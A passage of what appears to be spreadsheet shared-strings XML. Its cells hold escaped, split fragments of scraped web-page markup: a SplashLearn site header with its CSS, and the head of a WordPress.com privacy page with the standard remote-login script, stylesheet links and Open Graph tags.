pd-r-32"&gt;&lt;div class="dropbtn"&gt;Learning App&lt;/div&gt;&lt;span class="arrow-desktop"&gt;&lt;/span&gt;&lt;div class="dropdown-content"&gt;&lt;ul class="font-header js-header-dropdown-list"&gt;&lt;a href="/features/parents"&gt;How It works&lt;/a&gt;&lt;a href="/games"&gt;All Games&lt;/a&gt;&lt;a href="/math-games"&gt;Math Games&lt;/a&gt;&lt;a href="/ela-games"&gt;ELA Games&lt;/a&gt;&lt;a href="/worksheets"&gt;All Worksheets&lt;/a&gt;&lt;a href="/math-worksheets"&gt;Math Worksheets&lt;/a&gt;&lt;a href="/ela-worksheets"&gt;ELA Worksheets&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="header-buttons"&gt;&lt;div id="login-signup"&gt;&lt;a class="login-btn" href="/signin"&gt;Log in&lt;/a&gt;&lt;/div&gt;&lt;div id="" class=""&gt;&lt;a href="/register"&gt;&lt;button class="signup-btnn"&gt;Sign up&lt;/button&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="header-mobile-content" class="header v5-header header-mobile header-card-mobile"&gt;&lt;div class="container-1200 container-fluid" style="display:flex;"&gt;&lt;div class="hamburger mobile-dropdown js-mobile-dropdown"&gt;&lt;div class="header-mobiletab-burger-line header-mobiletab-burger-line1"&gt;&lt;/div&gt;&lt;div class="header-mobiletab-burger-line header-mobiletab-burger-line2"&gt;&lt;/div&gt;&lt;div class="header-mobiletab-burger-line header-mobiletab-burger-line3"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="logo-box" id="logo"&gt;&lt;a class="splashlearn-logo-mobile" href="/"&gt;&lt;img alt="SplashLearn Logo " class="splashlearn-logo-mobile" src="https://cdn.splashmath.com/assets/home/v5/logo-a26c535e83d56f82115a35713fd8c41179a928c83b9cef3bac76e9dc28c27c02.png" /&gt;&lt;/a&gt;&lt;a class="register-btn" href="/register"&gt;&lt;button name="button" type="submit" class="signup-btnn"&gt;Sign up&lt;/button&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="btn-container"&gt;&lt;div class="mobile-signup-button"&gt;&lt;a href="/signin"&gt;&lt;button class="signup-btnn login-btn"&gt;Log in&lt;/button&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="mobile-signup-button"&gt;&lt;a href="/register"&gt;&lt;button class=" signup-btnn"&gt;Sign Up&lt;/button&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="dropdown-mobile-login-page" class="dropdown-content-mobile"&gt;&lt;ul&gt;&lt;li class="border-li"&gt;&lt;a href="/" class="font-header"&gt;Parents&lt;/a&gt;&lt;/li&gt;&lt;li id="dropdown-edu-list" class="js-mobile-dropdown-edu font-header border-li</t>
  </si>
  <si>
    <t>edu-closed"&gt;Educators&lt;span class="arrow pull-right"&gt;&lt;/span&gt;&lt;div id="dropdown-mobile-login-page-edu" class="dropdown-menu-list"&gt;&lt;ul&gt;&lt;a href="/features/teachers" class="border-li-dropdown"&gt;Teacher&lt;/a&gt;&lt;a href="/administrators" class="border-li-dropdown"&gt;Administrators&lt;/a&gt;&lt;a href="/how-to-videos-for-teachers" class="border-li-dropdown"&gt;Teacher How To's&lt;/a&gt;&lt;a href="https://support.splashlearn.com/hc/en-us/categories/360002524794-Teachers" class="border-li-dropdown"&gt;Support&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;li id="dropdown-curr-list" class="js-mobile-dropdown-curr font-header border-li curr-closed"&gt;Learning App&lt;span class="arrow pull-right"&gt;&lt;/span&gt;&lt;div id="dropdown-mobile-login-page-curr" class="dropdown-menu-list"&gt;&lt;ul&gt;&lt;a href="/features/parents" class="border-li-dropdown"&gt;How it Works&lt;/a&gt;&lt;a href="/games" class="border-li-dropdown"&gt;All Games&lt;/a&gt;&lt;a href="/math-games" class="border-li-dropdown"&gt;Math Games&lt;/a&gt;&lt;a href="/ela-games" class="border-li-dropdown"&gt;ELA Games&lt;/a&gt;&lt;a href="worksheets" class="border-li-dropdown"&gt;All Worksheets&lt;/a&gt;&lt;a href="math-worksheets" class="border-li-dropdown"&gt;Math Worksheets&lt;/a&gt;&lt;a href="ela-worksheets" class="border-li-dropdown"&gt;ELA Worksheets&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;li class="border-li mobile-login-btn" style=""&gt;&lt;a href="/signin" class="font-header"&gt;Log in&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;style type="text/css"&gt;.mobile-login-btn{
  display: grid;
  place-content: center;
  padding-top:1rem;
  padding-bottom:2rem;
}
.mobile-login-btn a.font-header{
    width:300px;
    border:2px solid #4F52C3;
    border-radius:3.2rem;
    text-align:center;
    padding:7px 0;
}
.header-mobiletab-burger-line {
  background-color: #08064b;
  border-radius: 0.2rem;
  height: 4px;
}
.header-mobiletab-burger-line1 {
  width: 18px;
  margin-bottom: 3px;
}
.header-mobiletab-burger-line2 {
  width: 26px;
  margin-bottom: 3px;
}
.header-mobiletab-burger-line3 {
  width: 10px;
  margin-bottom: 0;
}
.hamburger {
    left: 4%;
    margin-top:12px;
    margin-left: 1rem;
  }
.hamburger.active{
  background-color: #EDEDF9;
  border-radius: 8px;
  padding:12px 9px;
  margin:0 ! important;
}
.header-desktop {
    height: 80px;
    border-bottom:</t>
  </si>
  <si>
    <t xml:space="preserve">2px solid #dcdcea ! important;
}
.header-desktop .header-container {
    display: flex;
    justify-content: space-between;
    width: 82%;
    height: 100%;
    margin: auto;
}
.arrow {
    border: solid black;
    border-width: 0 3px 3px 0;
    display: inline-block;
    padding: 3px;
    top:6px;
    position:relative;
    </t>
  </si>
  <si>
    <t>right:6%;
    transform: rotate(45deg);
    -webkit-transform: rotate(45deg);
}
.arrow-up {
    transform: rotate(224deg);
    -webkit-transform: rotate(224deg);
}
.arrow-down {
    transform: rotate(45deg);
    -webkit-transform: rotate(45deg);
}
.arrow-desktop{
    height: 8px;
    width: 8px;
    position: absolute;
    right: 24px;
    top: 34px;
    transform: rotate(45deg);
    border-bottom: 1px solid #090a4a;
    border-right: 1px solid #090a4a;
    color: #090a4a;
}
.header-section-card {
    height: 70px;
    background-color: #fff;
    border-bottom: 1px solid #dee2e6 !important;
}
.header-section-card-mobile {
    position: sticky;
    top: 0;
    z-index: 2;
    background-color: #fff;
}
.nav-items-wrapper {
    display: flex;
    align-items: center;
}
.nav-items-wrapper .nav-link {
    position: relative;
    padding: 14px 10px;
}
.nav-items-wrapper .nav-link:after {
    content: "";
    width: 0;
    height: 6px;
    display: block;
    position: absolute;
    left: 50%;
    transform: translateX(-50%);
    top: 60px;
    transition: width .3s ease,background-color .3s ease;
}
.nav-items-wrapper .nav-link.dropdown:after {
    top: 74px;
}
.nav-items-wrapper .nav-link:hover:after {
    width: 100%;
    background-color: #141975;
}
.nav-items-wrapper .nav-link.dropdown:hover:after {
    width: 84%;
    top: 74px;
}
.nav-items-wrapper .nav-link &gt;a {
    padding: 32px 0;
    color: #1a1a1a;
}
.show {display: block !important;}
.dropdown-content-mobile a {
    color: black;
    padding:1rem 0 1rem 2rem;
    text-decoration: none;
    display: block;
}
.dropdown-content-mobile {
  display: none;
  position: absolute;
  background-color: #ffffff;
  min-width: 100%;
  box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
  z-index: 3;
  padding-top: 71px
}
.container-fluid-header{
    width: 100%;
    margin-right: auto;
    margin-left: auto;
    padding: 1rem !</t>
  </si>
  <si>
    <t>important;
    margin-bottom: 0 !important;
}
.justify-content-center {
    justify-content: center ! important;
    display: flex !important;
    text-align: center;
}
.row {
    display: flex
}
.splashlearn-logo {
    width: 173px;
    margin-top: 16px;
}
.splashlearn-logo-not-clickable {
    cursor: default !important;
    pointer-events: none;
}
.splashlearn-logo-mobile{
    height: 40px;
}
.splashlearn-logo-not-clickable-mobile {
    pointer-events: none;
    cursor: default;
}
.font-header{
    font-family: graphie;
    font-style: normal;
    font-weight: 600;
    font-size: 16px;
    line-height: 22px;
    letter-spacing: 0.01em;
}
.header-buttons {
    display: flex;
    align-items: center;
}
.header-buttons .login-btn {
    margin-right: 34px;
    font-weight: 600;
    font-size: 18px;
    line-height: 24px;
    font-family: graphie,helvetica,arial,"sans-serif";
    border: 2px solid #4f52c3;
    border-radius: 32px;
    position: relative;
    cursor: pointer;
    color: #090a4a;
    padding: 12px 28px;
}
.header-buttons .login-btn:hover {
    border-color: #141975;
}
.dropbtn {
    padding: 16px;
    font-size: 16px;
    border: none;
    font-family: graphie;
    font-style: normal;
    font-weight: 600;
    letter-spacing: 0.01em;
    color: #1a1a1a;
}
.dropdown:hover .arrow-desktop {
    top: 38px;
    transform: rotate(-135deg);
}
.dropdown {
    position: relative;
    cursor: pointer;
}
.dropdown-content {
    display: none;
    position: absolute;
    top: 80px;
    left: -10px;
    background-color: #f1f1f1;
    box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
    z-index: 1;
}
.dropdown-content ul {
    width: 230px;
    border: solid 0.1rem #dcdcea;
    box-shadow: 0 0.3rem 0.6rem rgb(0 0 0 / 25%);
}
.dropdown-content a {
    background: #ffffff;
    text-align: left;
    color: #1a1a1a;
    padding: 10px 22px;
    text-decoration: none;
    display: block;
    border-bottom:</t>
  </si>
  <si>
    <t xml:space="preserve">1px solid #ededf9;
    cursor: pointer;
}
.dropdown-content a:hover {
    background-color: #ededf9;
    text-decoration: none;
    color: #4f52c3;
}
.signup-btnn {
    background-color: #090a4a;
    padding: 12px 28px;
    border-radius: 32px;
    font-weight: 600;
    height: 48px;
    cursor: pointer;
    color: #fff;
    border: none;
    font-size: 18px;
}
.login-btn{
    background-color:transparent;
    border:2px solid #4F52C3;
    color:#090A4A;
    margin-right:11px;
}
.signup-btnn:hover {
    background: #141975;
}
.dropdown:hover .dropdown-content {display: block;}
@media only screen and (max-width: 1279px){
    .header-desktop{
        display: none;
    }
    .header-mobile {
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;!--[if IE 6]&gt;
&lt;html id="ie6" lang="en"&gt;
&lt;! [endif]--&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>IE 8]&gt;
&lt;html id="ie8" lang="en"&gt;
&lt;! [endif]--&gt;
&lt;!--[if (!IE)]&gt;&lt;!--&gt;
&lt;html lang="en"&gt;
&lt;!--&lt;![endif]--&gt;
&lt;head&gt;
&lt;meta charset="UTF-8" /&gt;
&lt;title&gt;Privacy | Dan Russell-Pinson&lt;/title&gt;
&lt;link rel="profile" href="http://gmpg.org/xfn/11" /&gt;
&lt;link rel="pingback" href="https://dan-russell-pinson.com/xmlrpc.php" /&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Async WordPress.com Remote Login --&gt;
&lt;script id="wpcom_remote_login_js"&gt;
var wpcom_remote_login_extra_auth = '';
function wpcom_remote_login_remove_dom_node_id( element_id ) {
	var dom_node = document.getElementById( element_id );
	if ( dom_node ) { dom_node.parentNode.removeChild( dom_node ); }
}
function wpcom_remote_login_remove_dom_node_classes( class_name ) {
	var dom_nodes = document.querySelectorAll( '.' + class_name );
	for ( var i = 0; i &lt; dom_nodes.length; i++ ) {
		dom_nodes[ i ].parentNode.removeChild( dom_nodes[ i ] );
	}
}
function wpcom_remote_login_final_cleanup() {
	wpcom_remote_login_remove_dom_node_classes( "wpcom_remote_login_msg" );
	wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_key" );
	wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_validate" );
	wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_js" );
	wpcom_remote_login_remove_dom_node_id( "wpcom_request_access_iframe" );
	wpcom_remote_login_remove_dom_node_id( "wpcom_request_access_styles" );
}
// Watch for messages back from the remote login
window.addEventListener( "message", function( e ) {
	if ( e.origin === "https://r-login.wordpress.com" ) {
		var data = {};
		try {
			data = JSON.parse( e.data );
		} catch( e ) {
			wpcom_remote_login_final_cleanup();
			return;
		}
		if ( data.msg === 'LOGIN' ) {
			// Clean up the login check iframe
			wpcom_remote_login_remove_dom_node_id( "wpcom_remote_login_key" );
			var id_regex = new RegExp( /^[0-9]+$/ );
			var token_regex = new RegExp( /^.*|.*|.*$/ );
			if (
				token_regex.test( data.token )
				&amp;&amp; id_regex.test( data.wpcomid )
			) {
				//</t>
  </si>
  <si>
    <t>We have everything we need to ask for a login
				var script = document.createElement( "script" );
				script.setAttribute( "id", "wpcom_remote_login_validate" );
				script.src = '/remote-login.php?wpcom_remote_login=validate'
					+ '&amp;wpcomid=' + data.wpcomid
					+ '&amp;token=' + encodeURIComponent( data.token )
					 + '&amp;host=' + window.location.protocol
					+ '//'</t>
  </si>
  <si>
    <t xml:space="preserve">+ window.location.hostname
					+ '&amp;postid=692'
					+ '&amp;is_singular=';
				document.body.appendChild( script );
			}
			return;
		}
		// Safari ITP, not logged in, so redirect
		if ( data.msg === 'LOGIN-REDIRECT' ) {
			window.location = 'https://wordpress.com/log-in?redirect_to=' + window.location.href;
			return;
		}
		// Safari ITP, storage access failed, remove the request
		if ( data.msg === 'LOGIN-REMOVE' ) {
			var css_zap = 'html { -webkit-transition: margin-top 1s; transition: margin-top 1s; } /* 9001 */ html { margin-top: 0 !important; } * html body { margin-top: 0 !important; } @media screen and ( max-width: 782px ) { html { margin-top: 0 !important; } * html body { margin-top: 0 !important; } }';
			 var style_zap = document.createElement( 'style' );
			style_zap.type = 'text/css';
			style_zap.appendChild( document.createTextNode( css_zap ) );
			document.body.appendChild( style_zap );
			var e = document.getElementById( 'wpcom_request_access_iframe' );
			e.parentNode.removeChild( e );
			document.cookie = 'wordpress_com_login_access=denied; path=/; max-age=31536000';
			return;
		}
		// Safari ITP
		if ( data.msg === 'REQUEST_ACCESS' ) {
			console.log( 'request access: safari' );
			// Check ITP iframe enable/disable knob
			if ( wpcom_remote_login_extra_auth ! == 'safari_itp_iframe' ) {
				return;
			}
			// If we are in a "private window" there is no ITP.
			</t>
  </si>
  <si>
    <t>var private_window = false;
			try {
				var opendb = window.openDatabase( null, null, null, null );
			} catch( e ) {
				private_window = true;
			}
			if ( private_window ) {
				console.log( 'private window' );
				return;
			}
			var iframe = document.createElement( 'iframe' );
			iframe.id = 'wpcom_request_access_iframe';
			iframe.setAttribute( 'scrolling', 'no' );
			iframe.setAttribute( 'sandbox', 'allow-storage-access-by-user-activation allow-scripts allow-same-origin allow-top-navigation-by-user-activation' );
			iframe.src = 'https://r-login.wordpress.com/remote-login.php?wpcom_remote_login=request_access&amp;origin=' + encodeURIComponent( data.origin ) + '&amp;wpcomid=' + encodeURIComponent( data.wpcomid );
			var css = 'html { -webkit-transition: margin-top 1s; transition: margin-top 1s; } /* 9001 */ html { margin-top: 46px !important; } * html body { margin-top: 46px !important; } @media screen and ( max-width: 660px ) { html { margin-top: 71px !important; } * html body { margin-top: 71px !important; } #wpcom_request_access_iframe { display: block; height: 71px !important; } } #wpcom_request_access_iframe { border: 0px; height: 46px; position: fixed; top: 0; left: 0; width: 100%; min-width: 100%; z-index: 99999; background: #23282d; } ';
			var style = document.createElement( 'style' );
			style.type = 'text/css';
			style.id = 'wpcom_request_access_styles';
			style.appendChild( document.createTextNode( css ) );
			document.body.appendChild( style );
			document.body.appendChild( iframe );
		}
		if ( data.msg === 'DONE' ) {
			wpcom_remote_login_final_cleanup();
		}
	}
}, false );
// Inject the remote login iframe after the page has had a chance to load
// more critical resources
window.addEventListener( "DOMContentLoaded", function( e ) {
	var iframe = document.createElement( "iframe" );
	iframe.style.display = "none";
	iframe.setAttribute( "scrolling", "no" );
	iframe.setAttribute( "id", "wpcom_remote_login_key" );
	iframe.src = "https://r-login.wordpress.com/remote-login.php"
		+ "?wpcom_remote_login=key"
		+ "&amp;origin=aHR0cHM6Ly9kYW4tcnVzc2VsbC1waW5zb24uY29t"
		+ "&amp;wpcomid=31024752"
		+ "&amp;time=1681341672";
	document.body.appendChild( iframe );
}, false );
&lt;/script&gt;
&lt;link rel='dns-prefetch' href='//s0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//s2.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//s1.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//danrussellpinson.wordpress.com' /&gt;
&lt;link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Dan Russell-Pinson &amp;raquo; Feed" href="https://dan-russell-pinson.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Dan Russell-Pinson &amp;raquo; Comments Feed" href="https://dan-russell-pinson.com/comments/feed/" /&gt;
	&lt;script type="text/javascript"&gt;
		/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
		function addLoadEvent(func) {
			var oldonload = window.onload;
			if (typeof window.onload ! = 'function') {
				window.onload = func;
			} else {
				window.onload = function () {
					oldonload();
					func();
				}
			}
		}
		/* ]]&gt; */
	&lt;/script&gt;
	&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s0.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1677072837h&amp;ver=6.2-RC2-55570"}};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</si>
  <si>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crossorigin='anonymous' rel='stylesheet' id='all-css-0-1' href='https://s1.wp.com/_static/??-eJxtjEkOwyAQBD8UGOElyiXKWwwZIexhEQO2+H1sS74kOZa6umBLwsRQMBTwVSSq1gWGLZnoBXtH2L5IGuYb/L+RW5BhxpIms4iTfvTLtXVHjdnuS0ZY1ShHqUBXR2/QFM+AzlNuwKURHqGXf6r7Q/Vd3w3D/AFH9ES7&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-inline-css'&gt;
.has-text-align-justify {
	text-align:justify;
}
.wp-block-cover__image-background.has-parallax {
	background-size: cover;
}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-2-1' href='https://s1.wp.com/_static/??-eJyVj9EKwjAMRX/IrBPU6YP4LV0Ware2K03L2N8bHyZOZeBL4CY5uTdqimADutIRq56Vp85qcuQp5JWITs+UwJHROFfehgqZd2oLl9m7XkE4hvzcia4YG1iZIrKlZKB1Iw5yjHLUOIDYjiWDSbZTnGdH/59IOttg+AN/xZaGQqeZLUK+S1T+mdQXWJxwTCR9H/X3kxvYFIWBto2JmEGqt8UvlsLd/HV/as6Xpq6Ph/4BjgOajA==&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css'&gt;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100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-family--albert-sans: 'Albert Sans';--wp--preset--font-family--alegreya: Alegreya;--wp--preset--font-family--arvo: Arvo;--wp--preset--font-family--bodoni-moda: 'Bodoni Moda';--wp--preset--font-family--cabin: Cabin;--wp--preset--font-family--chivo: Chivo;--wp--preset--font-family--commissioner: Commissioner;--wp--preset--font-family--cormorant: Cormorant;--wp--preset--font-family--courier-prime: 'Courier Prime';--wp--preset--font-family--crimson-pro: 'Crimson Pro';--wp--preset--font-family--dm-mono: 'DM Mono';--wp--preset--font-family--dm-sans: 'DM Sans';--wp--preset--font-family--domine: Domine;--wp--preset--font-family--eb-garamond: 'EB Garamond';--wp--preset--font-family--epilogue: Epilogue;--wp--preset--font-family--figtree: Figtree;--wp--preset--font-family--fira-sans: 'Fira Sans';--wp--preset--font-family--fraunces: Fraunces;--wp--preset--font-family--ibm-plex-mono: 'IBM Plex Mono';--wp--preset--font-family--ibm-plex-sans: 'IBM Plex Sans';--wp--preset--font-family--inter: Inter;--wp--preset--font-family--josefin-sans: 'Josefin Sans';--wp--preset--font-family--jost: Jost;--wp--preset--font-family--libre-baskerville: 'Libre Baskerville';--wp--preset--font-family--libre-franklin: 'Libre Franklin';--wp--preset--font-family--literata: Literata;--wp--preset--font-family--lora: Lora;--wp--preset--font-family--merriweather: Merriweather;--wp--preset--font-family--montserrat: Montserrat;--wp--preset--font-family--newsreader: Newsreader;--wp--preset--font-family--nunito: Nunito;--wp--preset--font-family--open-sans: 'Open Sans';--wp--preset--font-family--overpass: Overpass;--wp--preset--font-family--petrona: Petrona;--wp--preset--font-family--piazzolla: Piazzolla;--wp--preset--font-family--playfair-display: 'Playfair Display';--wp--preset--font-family--plus-jakarta-sans: 'Plus Jakarta Sans';--wp--preset--font-family--poppins: Poppins;--wp--preset--font-family--raleway: Raleway;--wp--preset--font-family--roboto-slab: 'Roboto Slab';--wp--preset--font-family--roboto: Roboto;--wp--preset--font-family--rubik: Rubik;--wp--preset--font-family--sora: Sora;--wp--preset--font-family--source-sans-pro: 'Source Sans Pro';--wp--preset--font-family--source-serif-pro: 'Source Serif Pro';--wp--preset--font-family--space-mono: 'Space Mono';--wp--preset--font-family--texturina: Texturina;--wp--preset--font-family--work-sans: 'Work Sans';--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural:</t>
  </si>
  <si>
    <t>*{margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid &gt; *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-color{color: var(--wp--preset--color--white) !</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-4-1' href='https://s0.wp.com/_static/??/wp-content/themes/pub/coraline/style.css,/wp-content/themes/pub/coraline/inc/style-wpcom.css?m=1440107855j&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='jetpack_facebook_likebox-inline-css'&gt;
.widget_facebook_likebox {
	overflow: hidden;
}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-6-1' href='https://s1.wp.com/_static/??-eJzTLy/QTc7PK0nNK9HPLdUtyClNz8wr1k9PzdfNyU9OLMnMz0Ph6KblJGYW6SUXF+voY9dalJqUk58OZKbrA1UhcUGa7HNtDU1MLU1MLMwNTbIAmkQtqg==&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='jetpack-global-styles-frontend-style-inline-css'&gt;
:root { --font-headings: unset; --font-base: unset; --font-headings-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif; --font-base-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-8-1' href='https://s0.wp.com/_static/??-eJyVjUEKwjAQRS9kHAVb60I8isRJSFInM6GTULx9W3Ejrty9B5/3YS4GhavnCrmZQi0kVhh9LRafH4cyiWtYkzDklcgraLSTd9a51xsThz2q7uDf3j0xggomS4YkiH7JT7NGn9f3eIJA8rC0DW75euzPl+7QDUM/Lj+0TlE=&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;script id='wpcom-actionbar-placeholder-js-extra'&gt;
var actionbardata = {"siteID":"31024752","siteURL":"https:\/\/dan-russell-pinson.com","xhrURL":"https:\/\/dan-russell-pinson.com\/wp-admin\/admin-ajax.php","nonce":"316221b1ac","isLoggedIn":"","statusMessage":"","subsEmailDefault":"instantly","proxyScriptUrl":"https:\/\/s0.wp.com\/wp-content\/js\/wpcom-proxy-request.js?ver=20211021","shortlink":"https:\/\/wp.me\/P26aXe-ba","i18n":{"followedText":"New posts from this site will now appear in your &lt;a href=\"https:\/\/wordpress.com\/read\"&gt;Reader&lt;\/a&gt;","foldBar":"Collapse this bar","unfoldBar":"Expand this bar"}};
&lt;/script&gt;
&lt;script crossorigin='anonymous' type='text/javascript' src='https://s1.wp.com/_static/??/wp-content/js/mobile-useragent-info.js,/wp-content/plugins/video/assets/js/videojs/videopress-iframe-api.js,/wp-content/js/rlt-proxy.js?m=1674235413j'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
	window.addEventListener( 'DOMContentLoaded', function() {
		rltInitialize( {"token":null,"iframeOrigins":["https:\/\/widgets.wp.com"]} );
	} );
&lt;/script&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://danrussellpinson.wordpress.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress.com" /&gt;
&lt;link rel="canonical" href="https://dan-russell-pinson.com/privacy/" /&gt;
&lt;link rel='shortlink' href='https://wp.me/P26aXe-ba' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://public-api.wordpress.com/oembed/?format=json&amp;amp;url=https%3A%2F%2Fdan-russell-pinson.com%2Fprivacy%2F&amp;amp;for=wpcom-auto-discovery" /&gt;&lt;link rel="alternate" type="application/xml+oembed" href="https://public-api.wordpress.com/oembed/?format=xml&amp;amp;url=https%3A%2F%2Fdan-russell-pinson.com%2Fprivacy%2F&amp;amp;for=wpcom-auto-discovery" /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Jetpack Open Graph Tags --&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Privacy" /&gt;
&lt;meta property="og:url" content="https://dan-russell-pinson.com/privacy/" /&gt;
&lt;meta property="og:description" content="Privacy Policy for Mobile/Computer Apps Overview: This privacy policy explains how Freecloud Design, Inc. collects and uses information in our mobile apps and how this information is used. Personal…" /&gt;
&lt;meta property="article:published_time" content="2012-02-22T15:40:28+00:00" /&gt;
&lt;meta property="article:modified_time" content="2016-04-28T15:01:41+00:00" /&gt;
&lt;meta property="og:site_name" content="Dan Russell-Pinson" /&gt;
&lt;meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /&gt;
&lt;meta property="og:image:alt" content="" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="article:publisher" content="https://www.facebook.com/WordPresscom" /&gt;
&lt;meta name="twitter:text:title" content="Privacy" /&gt;
&lt;meta name="twitter:card" content="summary" /&gt;
&lt;!-- End Jetpack Open Graph Tags --&gt;
&lt;link rel="shortcut icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /&gt;
&lt;link rel="icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" /&gt;
&lt;link rel="apple-touch-icon" href="https://s2.wp.com/i/webclip.png" /&gt;
&lt;link rel='openid.server' href='https://dan-russell-pinson.com/?openidserver=1' /&gt;
&lt;link rel='openid.delegate' href='https://dan-russell-pinson.com/' /&gt;
&lt;link rel="search" type="application/opensearchdescription+xml" href="https://dan-russell-pinson.com/osd.xml" title="Dan Russell-Pinson" /&gt;
&lt;link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /&gt;
		&lt;style type="text/css"&gt;
			.recentcomments a {
				display: inline !important;
				padding: 0 !important;
				margin: 0 !important;
			}
			table.recentcommentsavatartop img.avatar, table.recentcommentsavatarend img.avatar {
				border: 0px;
				margin: 0;
			}
			table.recentcommentsavatartop a, table.recentcommentsavatarend a {
				border: 0px !important;
				background-color: transparent !important;
			}
			td.recentcommentsavatarend, td.recentcommentsavatartop {
				padding: 0px 0px 1px 0px;
				margin: 0px;
			}
			td.recentcommentstextend {
				border: none !important;
				padding:</t>
  </si>
  <si>
    <t>0px 0px 2px 10px;
			}
			.rtl td.recentcommentstextend {
				padding: 0px 10px 2px 0px;
			}
			td.recentcommentstexttop {
				border: none;
				padding: 0px 0px 0px 10px;
			}
			.rtl td.recentcommentstexttop {
				padding: 0px 10px 0px 0px;
			}
		&lt;/style&gt;
		&lt;style type="text/css"&gt;
.widget_twitter</t>
  </si>
  <si>
    <t>li {
	word-wrap: break-word;
}
&lt;/style&gt;
&lt;meta name="application-name" content="Dan Russell-Pinson" /&gt;&lt;meta name="msapplication-window" content="width=device-width;height=device-height" /&gt;&lt;meta name="msapplication-tooltip" content="Games, Art, Photography and more..." /&gt;&lt;meta name="msapplication-task" content="name=Subscribe;action-uri=https://dan-russell-pinson.com/feed/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta</t>
  </si>
  <si>
